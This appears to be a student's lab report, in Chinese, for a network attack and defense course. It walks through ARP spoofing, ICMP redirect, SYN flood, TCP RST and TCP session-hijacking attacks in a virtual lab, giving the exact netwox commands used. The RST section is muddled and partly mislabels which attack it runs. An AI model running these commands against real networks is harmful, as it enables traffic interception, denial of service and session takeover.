1. 程式人生 > 其它 >20211913-馮馨茹-2021-2022-2 《網路攻防實踐》實驗四

20211913-馮馨茹-2021-2022-2 《網路攻防實踐》實驗四

一、實驗內容

 通過實驗瞭解TCP/IP協議棧的幾種攻擊:ARP快取欺騙攻擊、ICMP重定向攻擊、SYN Flood攻擊、TCP RST攻擊、TCP會話劫持攻擊。

二、實驗步驟

1、ARP快取欺騙攻擊

檢視攻擊機kali的配置

檢視靶機1——MetaSploitable_Ubuntu的配置

檢視靶機2——Win2kServer的配置

由此可得:

攻擊機Kali:192.168.200.4  / 00:0c:29:85:74:d5 

靶機1MetaSploitable_Ubuntu:192.168.200.5 / 00:0c:29:84:9c:c8

靶機2Win2kSever:192.168.200.124 / 00:0c:29:e7:8a:19

 

使用靶機1MetaSploitable_Ubuntu Ping 靶機2Win2kSever,得到結果是聯通的

 輸入arp -a檢視arp表

 

 用攻擊機Kali ping 靶機1MetaSploitable_Ubuntu,得到結果是聯通的

 

在虛擬機器kali中使用命令sudo apt-get install netwox安裝netwox

 在攻擊機Kali中輸入命令netwox 80 -e 00:0c:29:85:74:d5 -i 192.168.200.5對靶機MetaSploitable_Ubuntu進行攻擊

返回靶機MetaSploitable_Ubuntu,輸入命令arp -a

再次檢視arp快取列表,發生了改變,說明攻擊成功。

 

 2、ICMP重定向攻擊

檢視Ubuntu的配置

輸入命令route -n檢視路由地址

 

由此可得:

攻擊機Kali:192.168.200.4 / 192.168.200.1

靶機Ubuntu:192.168.200.3

測試用Ubuntu ping 百度,是聯通的

 在攻擊機Kali的root許可權中輸入命令netwox 86 -f "host 192.168.200.3" -g 192.168.200.4 -i 192.168.200.1,進行ICMP重定向攻擊

 

 再用靶機Ubuntu ping 百度,發現下一跳地址都變成了攻擊機kali的IP地址192.168.200.4

 

 3、SYN Flood攻擊

所需虛擬機器配置:

Kali:192.168.200.4

Ubuntu:192.168.200.3

MetaSploitable_Ubuntu:192.168.200.5

在Ubuntu中輸入命令telnet 192.168.200.5,將Ubuntu和MetaSploitable_Ubuntu之間建立telnet聯絡,可以看到順利建立連線並登入。

 在Kali的root許可權中輸入命令netwox 76 192.168.200.5 -p 23,對MetaSploitable_Ubuntu的23號埠進行攻擊。

 回到Ubuntu再次輸入telnet 192.168.200.5,將Ubuntu和MetaSploitable_Ubuntu之間建立telnet聯絡,出現卡頓

 

 

 回到Kali虛擬機器,開啟Wireshark看到攻擊機通過不同的IP向靶機23號埠傳送大量的資料包,使得正常服務停止,無法找出攻擊IP地址。

 

 4、SYN Rst攻擊

所需虛擬機器環境配置:

Kali:192.168.200.4

Ubuntu:192.168.200.3

MetaSploitable_Ubuntu:192.168.200.5

在Ubuntu中輸入命令telnet 192.168.200.5,在Ubuntu和MetaSploitable_Ubuntu之間建立telnet聯絡,可以看到順利建立連線並登入。

 在攻擊機kali中的root許可權下輸入命令netwox 78 -i 192.168.200.5,在Kali上利用netwox的78號工具對MetaSploitable_Ubuntu的23號埠進行SYN Flood攻擊

 回到Ubuntu再次輸入命令telnet 192.168.200.5,無法建立telnet連結

 

 5、TCP會話劫持攻擊

所需虛擬機器環境配置:

Kali:192.168.200.4

Ubuntu:192.168.200.3

MetaSploitable_Ubuntu:192.168.200.123(昨天MetaSploitable_Ubuntu虛擬機器的IP地址還是192.168.200.5,今天重啟了就變成了192.168.200.123)

在Ubuntu中輸入命令telnet 192.168.200.123,在Ubuntu和MetaSploitable_Ubuntu之間建立telnet聯絡,此時先不要登入

然後在kali上開啟wireshark,開始捕包。然後在Ubuntu上輸入賬號:msfadmin,密碼:msfadmin登入。

回到kali的wireshark暫停捕包,並設定過濾條件tcp.port == 23,會有m、s、f、a、d、m、i、n的資料包。

 

 然後開啟最後一個包,觀察源埠,目的埠,NEXT Seq NMU和ACK的值

在kali的root許可權中輸入命令netwox 40 --ip4-dontfrag --ip4-offsetfrag 0 --ip4-ttl 64 --ip4-protocol 6 --ip4-src 192.168.200.4 --ip4-dst 192.168.200.123 --tcp-src 36178 --tcp-dst 23 --tcp-seqnum 123 --tcp-acknum 138 --tcp-ack --tcp-psh --tcp-window 64 --tcp-data "667872"偽造包

 然後可以在wireshark裡觀察到傳送的值:fxr

 三、實驗總結

在這次實驗中,我瞭解ARP快取欺騙攻擊、ICMP重定向攻擊、SYN Flood攻擊、TCP RST攻擊、TCP會話劫持攻擊這幾種攻擊原理,實驗內容比較多但是相比之前的要順暢一些,遇到的問題也比較容易解決。